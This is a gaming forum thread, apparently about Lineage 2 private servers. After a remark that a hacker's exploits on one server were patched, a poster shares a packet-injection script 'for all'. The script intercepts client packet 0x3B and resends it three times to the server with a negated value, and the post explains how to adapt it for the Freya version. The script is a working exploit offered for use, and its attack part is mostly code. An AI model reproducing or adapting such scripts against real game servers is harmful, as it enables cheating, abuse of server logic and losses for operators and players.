Jump to content

Recommended Posts

Posted

wont work anymore , and as i see RaRus is famous at Dragon network lol

quote from forum :

need clear some problems on x15 one retard hacker "RaRuS" hacked server on x15 and sended pms on friendlist to all server and hacked like 20 acc and now they must solve it

an update was just done to stop his exploits rofl , gj ;)

  • 3 months later...
Posted

Ok. Let it be for all:

var

i,b,c,j:integer;

 

 

begin

if FromClient and (pck[1]=#$3B) then

begin

    i:=6;

    b:=ReadD(i);

    c:=ReadD(i);

   

    pck:='';

    for j:=0 to 2 do

    begin

        buf:=#$3B;

        WriteD(1);

        WriteD(b);

        WriteD(-c);

        SendToServer;

    end;

end;

end.

 

if any one wants to try at Freya u need to change the line : WriteD(-c); to > WriteQ(-c) since packets in Freya changed :D

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock